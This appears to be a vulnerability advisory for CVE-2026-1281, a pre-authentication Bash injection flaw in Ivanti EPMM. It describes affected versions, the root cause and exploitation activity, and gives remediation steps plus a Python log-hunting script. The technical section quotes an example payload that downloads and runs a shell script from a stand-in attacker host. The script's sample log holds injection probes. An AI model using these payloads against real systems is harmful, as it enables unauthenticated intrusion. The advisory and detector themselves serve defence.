CVE-2026-1281

Ivanti EPMM — Pre-Auth Remote Code Execution via App Store URL Bash Injection
🔥 CVSS 3.1  9.8 / 10 — CRITICAL 🔴 CISA Known Exploited Vulnerability

What is Ivanti Endpoint Manager Mobile (EPMM)?

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron, is an enterprise Mobile Device Management (MDM) platform deployed by organizations to centrally manage and secure smartphones, tablets, and other mobile devices across their workforce. It is widely used in government agencies, healthcare organizations, and enterprises to enforce mobile security policies.

Key functions include:

  • Device enrollment and lifecycle management — provision, configure, and retire corporate and BYOD mobile devices
  • Policy enforcement — push security policies (encryption, screen lock, app restrictions) to enrolled devices
  • Application management — distribute, update, and remotely wipe enterprise applications from a central console
  • VPN and network access — configure and distribute VPN profiles and certificates to managed endpoints
  • Compliance monitoring — continuously assess enrolled device posture and flag non-compliant devices

EPMM is typically deployed as an on-premises appliance with its management interface exposed to the internet for device check-ins — which dramatically increases its attack surface. As an MDM server, a compromised EPMM instance can push malicious profiles, certificates, and applications to every enrolled device, making it an exceptionally high-value pivot point for enterprise network intrusion.

Overview

Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability (CWE-94) in its In-House Application Distribution feature that allows an unauthenticated remote attacker to achieve arbitrary command execution on the appliance. The companion vulnerability CVE-2026-1340 (also CVSS 9.8) affects the Android File Transfer (AFT) configuration feature via the same class of flaw in a different endpoint.

Both were exploited as zero-days before Ivanti's January 29, 2026 disclosure. Exploitation continued at mass scale through at least March 2026, with threat actors deploying webshells, establishing reverse shells, and staging data for exfiltration. The German BSI issued a national warning, and CERT-EU published a critical advisory.

Affected Versions

Version branch                    Vulnerable     Fix
EPMM 12.7.0.0 and prior           Yes            Apply RPM 12.7.0.x or 12.7.1.x
EPMM 12.6.x                       Yes            Apply RPM 12.6.0.x or 12.6.1.x
EPMM 12.5.x                       Yes            Apply RPM 12.5.0.x or 12.5.1.x
EPMM 12.8.0.0                     Not affected   Permanent fix: upgrade to 12.8.0.0
Ivanti Neurons for MDM (cloud)    Not affected
Ivanti Endpoint Manager (EPM)     Not affected
Ivanti Sentry                     Not affected

Temporary fix: Ivanti released out-of-band RPM patches on January 29, 2026. Apply either the .0.x or .1.x RPM for your installed version — only one RPM is required and no service downtime is necessary. The RPM patches replace the vulnerable Bash scripts with compiled Java classes (AppStoreUrlMapper.java and AFTUrlMapper.java).

Permanent fix: Upgrade to EPMM 12.8.0.0, released Q1 2026. Once on 12.8, no RPM patches need to be maintained.

Technical Details

Both CVE-2026-1281 and CVE-2026-1340 are Bash code injection vulnerabilities rooted in the same design pattern: EPMM routes certain HTTP requests through shell scripts that construct and evaluate Bash commands using unsanitized URL parameters.

CVE-2026-1281 — App Store URL injection:

Requests to the pattern /mifs/c/appstore/fob/3/<int>/sha256:<payload>/<filename>.ipa are handled by the Bash script /mi/bin/map-appstore-url. This script extracts fields from the URL path and uses them inside a Bash arithmetic expansion ($(( ... ))). An attacker can embed a command substitution expression (e.g., `id` or $(curl attacker.com/shell.sh|bash)) in the URL, which Bash then executes when evaluating the arithmetic expression.

CVE-2026-1340 — AFT URL injection:

The same flaw pattern exists in /mi/bin/map-aft-store-url, which handles Android File Transfer configuration requests. Exploitation is structurally identical.

Attack characteristics:

  • No credentials, session, or prior access required
  • Exploitable over the internet against any EPMM instance with a reachable management interface
  • Single HTTP GET request sufficient to achieve unauthenticated RCE as the EPMM service user
  • Public PoC available since January 30, 2026

CWE-94 (Improper Control of Generation of Code): The application passes attacker-controlled string data into a context that evaluates it as executable code (Bash arithmetic expansion), without neutralizing special characters that alter code semantics.

Discovery

The vulnerabilities were reported to Ivanti and confirmed as actively exploited zero-days prior to the January 29, 2026 public disclosure. watchTowr Labs published the first detailed public technical analysis and proof-of-concept on January 30, 2026. Horizon3.ai independently published exploit research and root-cause analysis shortly after.

This continues a pattern of sustained researcher attention on Ivanti EPMM: Ivanti's MDM platform has been exploited in multiple high-profile zero-day campaigns, including nation-state actors targeting government customers in prior years.

Exploitation Context

Exploitation was confirmed before Ivanti's public disclosure. Key indicators of the scope:

  • Exposure: Shadowserver Foundation identified approximately 1,600 internet-exposed EPMM instances globally at time of disclosure; Palo Alto Networks Cortex Xpanse telemetry placed the figure above 4,400 instances.
  • Initial exploitation spike: Shadowserver observed exploitation attempts from at least 13 distinct source IPs within 24 hours of the PoC publication.
  • Mass exploitation wave: By March 2026, Telekom Security documented a sustained mass exploitation campaign. Post-exploitation activity included:
    • Webshell deployment (files named 401.jsp / 403.jsp)
    • Reverse shell establishment over TCP/443
    • Secondary payload retrieval via curl / wget
    • Database export and data staging
    • Cleanup commands and anti-forensic behavior
  • Sectors targeted: Confirmed victims reported by Palo Alto Unit 42 span state and local government, healthcare, manufacturing, professional and legal services, and high technology — across the United States, Germany, Australia, and Canada.
  • GreyNoise intelligence: Traced a significant portion of active exploitation traffic to a single bulletproof hosting IP, suggesting coordinated threat actor infrastructure rather than purely opportunistic scanning.
  • Chaining risk: Both CVE-2026-1281 and CVE-2026-1340 can be exploited independently or in sequence; chaining both provides redundant RCE paths even if one endpoint is partially mitigated.
  • Government warnings: The German Federal Office for Information Security (BSI) issued a national-level warning; CERT-EU published advisory 2026-001.

Remediation

  1. Apply the RPM patch immediately — install the RPM for your EPMM version branch (12.5.x, 12.6.x, or 12.7.x) from the Ivanti support portal; no downtime is required
  2. Plan upgrade to EPMM 12.8.0.0 — the RPM is a temporary mitigation; only the full version upgrade eliminates the vulnerable code path permanently
  3. Restrict internet access to the EPMM management interface — EPMM should not be directly reachable from the public internet; place it behind a VPN gateway or restrict by allowlisted IP ranges using firewall ACLs
  4. Hunt for compromise indicators — search web server logs for requests matching /mifs/c/appstore/fob/ and /mifs/c/appstore/aft/ containing backtick or $() sequences; check for unexpected .jsp files in the EPMM web root (especially 401.jsp, 403.jsp)
  5. Review outbound connections — look for unexpected curl/wget calls, reverse shell connections (outbound TCP/443 to non-Ivanti infrastructure), and unusual process trees spawned by the EPMM service account
  6. Check enrolled device integrity — if EPMM was compromised, any profile, certificate, or application pushed to enrolled devices after the compromise window should be treated as potentially malicious
  7. Discontinue use if patching and network isolation cannot be achieved promptly; EPMM compromise gives attackers control over all enrolled mobile endpoints
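The hunt in step 4 and the CWE-94 point above (path fields must be allowlisted, never handed to a shell) can be exercised together. The following script is an added example, not Ivanti's code and not part of the advisory: it extracts request targets from a constructed access log, percent-decodes them (an attacker can send `$(` as `%24%28` and a backtick as `%60`, so a literal search for the raw sequences misses encoded probes), flags requests under the /mifs/c/appstore/fob/ and /mifs/c/appstore/aft/ prefixes that contain backtick or `$(`, and separately flags App Store paths that fail a strict allowlist parser. The assumption that a legitimate digest field is 64 lowercase hex characters, the filename character set, and the group names are this example's own, not the product's.

```python
"""
Added example (not Ivanti's code, not from the advisory): a hunt over web
server access logs for the App Store / AFT request patterns described in
remediation step 4, plus the strict field allowlist that the vulnerable
scripts lacked (the CWE-94 point in the Technical Details section).
"""
import re
from urllib.parse import unquote

# Prefixes named in the advisory's hunting guidance.
WATCHED_PREFIXES = ("/mifs/c/appstore/fob/", "/mifs/c/appstore/aft/")

# Sequences named in the advisory: backtick and $( command substitution.
SHELL_METACHARS = ("`", "$(")

# Strict allowlist for the App Store URL layout quoted in the advisory.
# Assumptions (not from the advisory): the digest field of a legitimate
# request is 64 lowercase hex characters and the filename uses a conservative
# character set. The group names are placeholders of this example.
APPSTORE_PATH = re.compile(
    r"^/mifs/c/appstore/fob/3/(?P<index>[0-9]+)"
    r"/sha256:(?P<digest>[0-9a-f]{64})"
    r"/(?P<filename>[A-Za-z0-9][A-Za-z0-9._-]*\.ipa)$"
)

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[0-9.]+"')


def normalize_target(target: str, max_rounds: int = 3) -> str:
    """Drop the query string and percent-decode until stable (bounded), so
    encoded or double-encoded %24%28 / %60 sequences are seen as $( and `."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def parse_appstore_path(path: str):
    """Return the validated fields of a well-formed App Store URL, or None.
    A parser like this is the safe alternative to handing raw path segments
    to a shell: anything outside the allowlist is rejected, never evaluated."""
    m = APPSTORE_PATH.match(path)
    return m.groupdict() if m else None


def classify_request(path: str):
    """Return a reason string for a suspicious request, or None if benign."""
    if not path.startswith(WATCHED_PREFIXES):
        return None
    if any(seq in path for seq in SHELL_METACHARS):
        return "shell-metacharacter"
    if path.startswith(WATCHED_PREFIXES[0]) and parse_appstore_path(path) is None:
        return "malformed-appstore-path"
    return None


def hunt(log_text: str):
    """Scan access-log text; return one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = normalize_target(m.group("target"))
        reason = classify_request(path)
        if reason:
            findings.append({
                "line": lineno,
                "source": line.split(" ", 1)[0],
                "path": path,
                "reason": reason,
            })
    return findings


# Constructed sample log (made-up addresses, timestamps and file names).
SAMPLE_LOG = """\
203.0.113.10 - - [30/Jan/2026:08:12:01 +0000] "GET /mifs/c/appstore/fob/3/17/sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef/CorpMail.ipa HTTP/1.1" 200 5120
203.0.113.10 - - [30/Jan/2026:08:12:05 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 2211
198.51.100.7 - - [30/Jan/2026:09:40:13 +0000] "GET /mifs/c/appstore/fob/3/1/sha256:`id`/x.ipa HTTP/1.1" 500 0
198.51.100.7 - - [30/Jan/2026:09:40:20 +0000] "GET /mifs/c/appstore/fob/3/1/sha256:%24%28id%29/x.ipa HTTP/1.1" 500 0
198.51.100.9 - - [30/Jan/2026:09:41:02 +0000] "GET /mifs/c/appstore/aft/1/%60id%60 HTTP/1.1" 500 0
198.51.100.9 - - [30/Jan/2026:09:41:30 +0000] "GET /mifs/c/appstore/fob/3/1/sha256:abc/x.ipa HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f['line']}: {f['reason']} from {f['source']}: {f['path']}")
```

To run it over a real access log, pass the file contents to hunt() instead of SAMPLE_LOG. The "malformed-appstore-path" finding is deliberately lower confidence than "shell-metacharacter": it catches probes that avoid the two sequences the advisory names but still do not look like a legitimate App Store request, and a few hits there are worth a manual look rather than an automatic alert.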

Key Details

Property              Value
CVE ID                CVE-2026-1281
Vendor / Product      Ivanti — Endpoint Manager Mobile (EPMM)
NVD Published         2026-01-29
NVD Last Modified     2026-01-30
CVSS 3.1 Score        9.8
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity              CRITICAL
CWE                   CWE-94
CISA KEV Added        2026-01-29
CISA KEV Deadline     2026-02-01
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector         Network
Attack Complexity     Low
Privileges Required   None
User Interaction      None
Scope                 Unchanged
Confidentiality       High
Integrity             High
Availability          High

Required Action

CISA BOD 22-01 Deadline: 2026-02-01. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

Date        Event
2026-01-29  Ivanti discloses CVE-2026-1281 and CVE-2026-1340 as actively exploited zero-days; temporary RPM patches released
2026-01-29  Added to CISA Known Exploited Vulnerabilities catalog
2026-01-30  watchTowr Labs publishes technical analysis and proof-of-concept exploit code
2026-01-30  Shadowserver Foundation records exploitation spike from 13+ source IPs; ~1,600 exposed EPMM instances identified
2026-02-01  CISA BOD 22-01 remediation deadline
2026-03-01  Telekom Security documents sustained mass exploitation wave with webshell deployment and data exfiltration activity